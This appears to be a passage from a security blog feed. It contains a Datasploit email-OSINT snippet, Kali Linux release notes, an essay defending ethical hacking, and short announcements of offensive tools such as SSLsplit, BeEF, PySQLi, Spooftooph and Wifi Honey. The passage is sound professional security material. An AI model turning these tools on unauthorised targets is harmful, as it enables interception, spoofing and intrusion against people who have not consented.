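        result = subprocess.run(
            ["python", "emailOsint.py", email],
            cwd="/etc/datasploit",
            capture_output=True,
            text=True,
        )
        return result.stdout

    if __name__ == "__main__":
        print(run_email_osint("russ@holisticinfosec.org"))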
Give Datasploit a try for sure.
Cheers, until next time...

Hacking WPA Enterprise with Kali Linux

Admittedly, somewhat of a click-bait blog post title - but bear with us, it's for a good reason. Lots of work goes on behind the scenes of Kali Linux, tools get updated every day and interesting new features are added constantly. Most of these tool updates and feature additions go unannounced, and are then discovered by inquisitive users - however this time, we had to make an exception.

Toolsmith Release Advisory: Kali Linux 2016.2 Release

On the heels of Black Hat and DEF CON, 31 AUG 2016 brought us the second Kali Rolling ISO release aka Kali 2016.2. This release provides a number of updates for Kali, including:
  • New KDE, MATE, LXDE, e17, and Xfce builds for folks who want a desktop environment other than Gnome.
  • Kali Linux Weekly ISOs, updated weekly builds of Kali that will be available to download via their mirrors.
  • Bug Fixes and OS Improvements such as HTTPS support in busybox now allowing the preseed of Kali installations securely over SSL. 
All details available here: https://www.kali.org/news/kali-linux-20162-release/
Thanks to Rob Vandenbrink for calling out this release. 

Kali Rolling ISO of DOOM, Too.

A while back we introduced the idea of Kali Linux Customization by demonstrating the Kali Linux ISO of Doom. Our scenario covered the installation of a custom Kali configuration which contained select tools required for a remote vulnerability assessment. The customised Kali ISO would undergo an unattended autoinstall in a remote client site, and automatically connect back to our OpenVPN server over TCP port 443. The OpenVPN connection would then bridge the remote and local networks, allowing us full "layer 3" access to the internal network from our remote location. The resulting custom ISO could then be sent to the client who would just pop it into a virtual machine template, and the whole setup would happen automagically with no intervention - as depicted in the image below.

How to become a pentester

Intro: I receive a lot of emails. (Please don't make it worse, thanks!) Unfortunately I don't have as much spare time as I used to, or would like to, so I often have no other choice than to redirect questions to our forums or our IRC channel (#corelan on freenode), hoping that other members […]

In Defense of Ethical Hacking

Pete Herzog wrote an interesting piece on Dark Matters (Norse's blog platform) a while back, and I've given it a few days to sink in because I didn't want my response to be emotional. After a few days I've re-read the post a few more times and still have no idea where Pete, someone I otherwise consider fairly sane and smart (see his bio - http://blog.norsecorp.com/author/pherzog/), gets the premise he's writing about. In fact, it annoyed me enough that I wrote up a response to his post… and Pete, I'm confused where this point of view comes from! I'd genuinely like to know… I'll reach out and see if we can figure it out.

— For the sake of this blog post, I consider ethical hacking and penetration testing to effectively be the same thing. I know not everyone agrees, and that’s unfortunate, but I guess you can’t please everyone.

So here are my comments on Pete's blog post titled "The Myth of Ethical Hacking" (http://blog.norsecorp.com/2015/01/27/the-myth-of-ethical-hacking/).



I thought reacting is what you did when you weren’t secure. And I thought ethical hacking was proactive, showing you could take advantage of opportunities left by the stupid people who did the security.
— Boy, am I glad he doesn't think this way anymore. Reacting is part of life, but it's not done because you're insecure; it's done because business and technology, along with your adversaries, are dynamic. It's like standing outside without an umbrella. It's not raining… but if you stand there long enough, you'll need an umbrella. It's not that you are stupid, it's that the weather changes. If you're in Chicago, like I am, this happens about every 2.7 seconds.
I also thought ethical hacking and security testing were the same thing, because while security testing focused on making sure all security controls were there and working right and ethical hacking focused on showing a criminal could penetrate existing security controls, both were about proactively learning what needed to be better secured.
— That's an interesting distinction. I can't say I believe this is any more than a simple difference in word choice. Isn't this all about validation of the security an organization thinks it has, versus the reality of how attackers act and what they will target? I guess I could be wrong, but these terms (vulnerability testing, penetration testing, ethical hacking, security testing) create confusion in the people trying to consume these services, understand security, and hire. Do they have any real value? I think this is one reason standards efforts by people in the security testing space were started: to demystify, de-obfuscate, and lessen confusion. Clearly it's not working as intended?
Ethical hacking, penetration testing, and red-teaming are still considered valid ways to improve security posture despite that they test the tester as much, if not more, than the infrastructure.
— Now, here's a statement that I largely agree with. It's not controversial anymore to say this. This is why things like the PTES (Penetration Testing Execution Standard) were born; standardizing how a penetration test (or ethical hack; these should be the same thing in my mind) is performed addresses exactly this problem. Taking a look at the people behind this standard, you can easily see that it's not just another shot in the dark or empty effort - http://www.pentest-standard.org/index.php/FAQ. Let me address red teaming for a minute too. Red Team exercises are not the same thing as penetration testing and ethical hacking — not really — it's like the difference between asking someone if they can pick the lock on the front door, versus daring someone to break into your house and steal your passport without reservation. Red Teaming is a more aggressive approach. I've heard some call Red Team exercises "closer to what an actual attacker would behave like"; your mileage may vary on that one. Bottom line, though, you always get the quality you ask for (pay for). If you are willing to pay for high-grade talent, generally speaking you'll get high-grade talent. If you're looking for a cheap penetration test, your results will likely be vastly different, because the resources on the job may not be as senior or knowledgeable. The other thing here is this: not all penetration testers are experts in all the technologies at your shop. Keep this in mind. Some folks are magicians with a Linux/Unix system, while others have grown their expertise in the Windows world. Some are web application experts, some are infrastructure experts, and some are generalists. The bottom line is that this is both true and something that should be accounted for, and it's largely not the fault of the tester.
Then again nearly everything has a positive side we can see if we squint. And as a practical, shake-the-CEO-into-awareness technique, criminal hacking simulations should be good for fostering change in a security posture.
— I read this and wonder to myself… if the CEO hasn’t already been “shaken into awareness” through headlines in the papers and nightly news, then there is something else going on here that a successful ethical hack ransack of the enterprise likely won’t solve.
So somehow, ethical hackers with their penetration testing and red-teaming, despite any flaws, have taken on this status of better security than, say, vulnerability scanning. Because there’s a human behind it? Is it artisan, and thus we pay more?
— Wait, what?! If you see these two as equal, then you’ve either done a horrible job at picking your ethical hacker/penetration testers, or you don’t understand what you’re saying. As someone who spent a few years demonstrating to companies that web application security tools were critical to their success, I’ve never, ever said they can replace a human tester. Ever. To answer the question directly — YES, because there’s a human behind it, this is an entirely different thing. See above about quality of penetration tester, but the point stands.
It also has a fatal flaw: It tests for known vulnerabilities. However, in great marketing moves of the world volume 1, that is exactly how they promote it. That’s why companies buy it. But if an ethical hacker markets that they test only for known vulnerabilities, we say they suck.
— Oh, I think I see what's going on here. The author is confusing vulnerability assessment with penetration testing, maybe; that's the only logical explanation I can think of. Penetration testers have a massive advantage over scanning tools because of this wonderful thing called the human intellect. They can see and interpret errors that systems kick back. Tools look for patterns and respond accordingly, so there are times when a human can see an error message and understand what it's implying, but the machine has no such ability. In spite of all of technology's advancements, tools are still using regular expressions and some rudimentary if-then clauses for pattern recognition. Machines, and by extension software, do not think. This gives software a disadvantage against a human 100% of the time.
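To make that concrete, here's a toy sketch (my illustration, not anything from Pete's post) of how signature-based detection works and why it misses anything its patterns don't anticipate. The signatures and the response string are invented for the example.

    import re

    # Toy signature-based check: the "scanner" only flags responses
    # matching patterns it already knows about.
    ERROR_SIGNATURES = [
        re.compile(r"You have an error in your SQL syntax"),  # MySQL
        re.compile(r"ORA-\d{5}"),                             # Oracle
    ]

    def scanner_flags(response_body):
        return any(sig.search(response_body) for sig in ERROR_SIGNATURES)

    # A human tester reading this response would suspect injection anyway;
    # the signature list stays silent, so the tool reports nothing.
    print(scanner_flags("Warning: unexpected token near '1=1' in query"))  # False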
Now vulnerability scanning is indeed reactive. We wait for known flaws to be known, scan for them, and we then react to that finding by fixing it. Ethical hacking is indeed proactive. But not because it gives the defender omniscient threat awareness, but rather so we can know all the ways where someone can break in. Then we can watch for it or even fix it.
— I'm going to ignore the whole reactive-vs-proactive debate here. I don't believe it's productive to this post, and I think many people don't understand what these terms mean in security anyway. First, you'll never, ever know "all the ways someone can break in", ever. Never. That's the beauty of the human mind. Human beings are a creative bunch, and when properly incentivized, we will find a way once we've exhausted all the known ways. However, there's a little caveat here, which I don't believe is talked about enough: the reason we won't ever know all the ways someone can break in, even if we give humans the ability to find all the ways, is this thing called scope, and time. Penetration testers, ethical hackers, and whatever else you want to call them are time-boxed. Rarely do you get an open-ended contract, or even, in the case of an internal resource, the ability to dedicate all the time you have to the task of finding ways to break in. Furthermore, there are typically many, many ways to break in. Systems can be misconfigured, unpatched, and left exposed in a million different ways. And even if you did have all the time you needed, these systems are dynamic and are going to change on you at some point, unless you work in one of "those" organizations, and if so then you've got bigger problems.
But does it really work that way? Isn’t what passes for ethical hacking too often just running vulnerability scanners to find the low hanging fruit and exploit that to prove a criminal could get in? Isn’t that really just finding known vulnerabilities like a vulnerability scanner does, but with a little verification thrown in?
— And here it is. Let me answer this question from the many, many people I know who do actual ethical hacking/penetration testing: no. Also if you find this to be actually true in your experience, you’re getting the wrong penetration testers. Maybe fire your provider or staff.
There’s this myth that ethical hackers will make better security by breaking through existing security in complicated, sometimes clever ways that point out the glaring flaw(s) of the moment for remediation.
— Talk to someone who does serious penetration testing for a living, or manages one of these teams. Many of them have a store of clever, custom code up their sleeves but rarely have to use it because the systems they test have so much broken on them that dropping custom code isn’t even remotely necessary.
But we know that all too often it’s just vulnerability scanning with scare tactics.
— Again, you're dealing with some seriously amateurish people or providers. Fire them.
And when there’s no way in, they play the social engineering card.
— a) I don’t see the issue with this approach, b) there’s a 99.9% chance there is a way in without “playing the social engineering card”.
One of the selling points of ethical hacking is the skilled use of social engineering. Let me save you some money: It works.
— Yes, 90%+ of the time, even when the social engineer isn't particularly skilled, it works. Why? Human nature, and employees who don't know better. So what if it works, though? You still need to leverage that testing to show real use cases of how your defenses were easily penetrated, for educational purposes. Record it. Highlight those employees who let that guy with the four coffee cups in his hands through the turnstile without asking for a badge… but do it constructively so that they and their peers will remember. Testing should drive awareness, and real-life use cases are priceless.
So if ethical hacking as it’s done is a myth…
— Let me stop you right there. It’s not, you’ve just had some terrible experiences I don’t believe are indicative of the wider industry. So since the rest of the article is based on this, I think we’re done here.

Pentoo 2013.0 RC1.1 Released

Pentoo is a security-focused live CD based on Gentoo. It's basically a Gentoo install with lots of customized tools, a customized kernel, and much more. Pentoo 2013.0 RC1.1 features:
  • Changes saving
  • CUDA/OpenCL-enhanced cracking software (John the Ripper, the Hashcat suite of tools)
  • Kernel 3.7.5 and all needed patches for injection
  • XFCE 4.10
  • All the latest tools and a responsive development team!

WAppEx v2.0 : Web Application exploitation Tool

WAppEx is an integrated Web Application security assessment and exploitation platform designed with the whole spectrum of users in mind, from security professionals to web application hobbyists. It suggests a security assessment model that revolves around an extensible exploit database. Further, it complements that power with the various tools required to perform all stages of a web application attack.

BlindElephant – Web Application Fingerprinting

During Black Hat USA 2010, Patrick Thomas presented a new web application fingerprinting tool called BlindElephant. The BlindElephant Web Application Fingerprinter attempts to discover the version of a (known) web application by comparing static files at known locations against precomputed hashes for versions of those files in all available releases. The technique is fast.
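As a rough illustration of the approach (a sketch of the general technique, not BlindElephant's actual code), static-file fingerprinting boils down to hashing known files and looking the digests up in a precomputed table. The URL, path, and hash values below are invented for the example.

    import hashlib
    import urllib.request

    # Hypothetical per-version SHA-256 digests of a known static file;
    # real tools precompute these across every release of the target app.
    KNOWN_HASHES = {
        "3f2a...": "ExampleCMS 2.1",  # placeholder digests
        "9c4b...": "ExampleCMS 2.2",
    }

    def fingerprint(base_url, path="/readme.html"):
        # Fetch the static file and match its hash against the table.
        with urllib.request.urlopen(base_url + path) as resp:
            digest = hashlib.sha256(resp.read()).hexdigest()
        return KNOWN_HASHES.get(digest, "unknown version")

    # Example (only against hosts you are authorized to test):
    # print(fingerprint("http://target.example"))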

PwnPi v2.0 – A Pen Test Drop Box distro for the Raspberry Pi

PwnPi is a Linux-based penetration testing dropbox distribution for the Raspberry Pi. It currently has 114 network security tools pre-installed to aid the penetration tester. It is built on the Debian Squeeze image from the Raspberry Pi Foundation's website and uses Xfce as the window manager. The login username and password are root:root.

SSLsplit v 0.4.5 – Man-in-the-middle attacks against SSL/TLS

SSLsplit is a tool for man-in-the-middle attacks against SSL/TLS encrypted network connections. Connections are transparently intercepted through a network address translation engine and redirected to SSLsplit. SSLsplit terminates SSL/TLS and initiates a new SSL/TLS connection to the original destination address, while logging all data transmitted. SSLsplit is intended to be useful for network…

TXDNS v 2.2.1 – Aggressive multithreaded DNS digger

TXDNS is a Win32 aggressive multithreaded DNS digger, capable of placing thousands of DNS queries per minute on the wire. TXDNS's main goal is to expose a domain namespace through a number of techniques (a toy sketch of the typo permutations follows this list):
  • Typos: Mised, doouble and transposde keystrokes (the misspellings illustrate the technique)
  • TLD/ccSLD rotation
  • Dictionary attack
  • Full brute-force attack: alpha, numeric or alphanumeric charsets
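As promised, here is a toy sketch of the typo-permutation idea; this is my illustration of the general technique, not TXDNS code.

    # Generate "missed", "doubled" and "transposed" keystroke variants
    # of a name, the typo techniques listed above.
    def typo_candidates(name):
        out = set()
        for i in range(len(name)):
            out.add(name[:i] + name[i + 1:])                # missed keystroke
            out.add(name[:i] + name[i] * 2 + name[i + 1:])  # doubled keystroke
            if i < len(name) - 1:                           # transposed keystrokes
                out.add(name[:i] + name[i + 1] + name[i] + name[i + 2:])
        return out

    print(sorted(typo_candidates("example"))[:10])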

PySQLi – Python SQL injection framework

PySQLi is a Python framework designed to exploit complex SQL injection vulnerabilities. It provides dedicated bricks that can be used to build advanced exploits, or easily extended/improved to fit the case. PySQLi is designed to be easily modified and extended through derived classes, and to be able to inject in various ways, such as via the command line, custom network protocols, and even in…

Joomscan updated – now can identify 673 joomla vulnerabilities

Security Team Web-Center just released an update for the Joomscan Security Scanner. The new database has 673 Joomla vulnerabilities. Joomla! is probably the most widely used CMS out there due to its flexibility, user friendliness, and extensibility, to name a few. So, watching its vulnerabilities and adding such vulnerabilities as KB entries to the Joomla scanner takes ongoing activity. It will help web…

BeEF 0.4.3.8 – Browser Exploitation Framework

The Browser Exploitation Framework (BeEF) is a powerful professional security tool. It is a penetration testing tool that focuses on the web browser. BeEF is pioneering techniques that provide the experienced penetration tester with practical client-side attack vectors. Unlike other security frameworks, BeEF focuses on leveraging browser vulnerabilities to assess the security posture of a…

Spooftooph 0.5.2 – Automated spoofing or cloning Bluetooth device

Spooftooph is designed to automate spoofing or cloning of a Bluetooth device's Name, Class, and Address. Cloning this information effectively allows a Bluetooth device to hide in plain sight. Bluetooth scanning software will only list one of the devices if more than one device in range shares the same device information while the devices are in Discoverable Mode (specifically, the same Address).

Wifi Honey – Creates fake APs using all encryption

Wifi Honey is a script an attacker can use to create fake APs using all encryption types and monitor them with airodump-ng. It automates the setup process: it creates five monitor-mode interfaces, four used as APs and the fifth for airodump-ng. To make things easier, rather than having five windows, all of this is done in a screen session, which allows you to switch between screens to see what is going on.